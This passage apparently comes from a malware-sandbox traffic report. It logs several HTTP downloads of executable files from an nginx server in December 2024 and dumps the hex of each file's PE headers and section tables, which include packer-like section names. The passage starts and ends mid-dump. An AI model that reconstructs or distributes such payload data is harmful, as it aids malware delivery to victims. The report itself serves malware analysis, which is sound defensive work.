00 00 04 86 c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 6e 00 00 10 00 00 00 40 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 b0 6e 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 6e 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 38 00 00 d0 6e 00 00 02 00 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 75 77 78 71 69 73 6c 00 f0 1b 00 00 a0 a7 00 00 ea 1b 00 00 56 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 67 66 61 6a 6a 77 64 00 10 00 00 00 90 c3 00 00 04 00 00 00 40 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 c3 00 00 22 00 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:07 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:13 GMTContent-Type: application/octet-streamContent-Length: 1846272Last-Modified: Sun, 15 Dec 2024 23:57:25 GMTConnection: keep-aliveETag: "675f6ce5-1c2c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 00 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 49 00 00 04 00 00 83 b5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 40 05 00 00 02 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6f 78 73 6c 69 73 6f 00 b0 19 00 00 40 2f 00 00 a6 19 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 7a 74 6c 68 73 76 6e 00 10 00 00 00 f0 48 00 00 04 00 00 00 06 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 49 00 00 22 00 00 00 0a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:22 GMTContent-Type: application/octet-streamContent-Length: 1836544Last-Modified: Sun, 15 Dec 2024 23:57:32 GMTConnection: keep-aliveETag: "675f6cec-1c0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6b 61 75 61 69 77 6d 00 70 1a 00 00 20 50 00 00 62 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 70 6b 76 68 7a 62 63 00 10 00 00 00 90 6a 00 00 04 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 e4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:33 GMTContent-Type: application/octet-streamContent-Length: 967168Last-Modified: Sun, 15 Dec 2024 23:55:31 GMTConnection: keep-aliveETag: "675f6c73-ec200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 64 6c 5f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 12 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 5a 6f 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f8 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 56 01 00 00 40 0d 00 00 58 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 4c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:43 GMTContent-Type: application/octet-streamContent-Length: 2779136Last-Modified: Sun, 15 Dec 2024 23:55:59 GMTConnection: keep-aliveETag: "675f6c8f-2a6800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 70 72 76 70 6c 75 61 00 20 2a 00 00 a0 00 00 00 08 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 74 79 78 6b 6e 6c 71 00 20 00 00 00 c0 2a 00 00 04 00 00 00 42 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:02:59 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 14 Dec 2024 21:12:38 GMTConnection: keep-aliveETag: "675df4c6-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 76 6d 78 6b 6f 62 00 80 19 00 00 f0 2e 00 00 7a 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 61 77 61 6c 6d 68 00 10 00 00 00 70 48 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 48 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:03:15 GMTContent-Type: application/octet-streamContent-Length: 2779136Last-Modified: Sun, 15 Dec 2024 23:56:01 GMTConnection: keep-aliveETag: "675f6c91-2a6800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 70 72 76 70 6c 75 61 00 20 2a 00 00 a0 00 00 00 08 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 74 79 78 6b 6e 6c 71 00 20 00 00 00 c0 2a 00 00 04 00 00 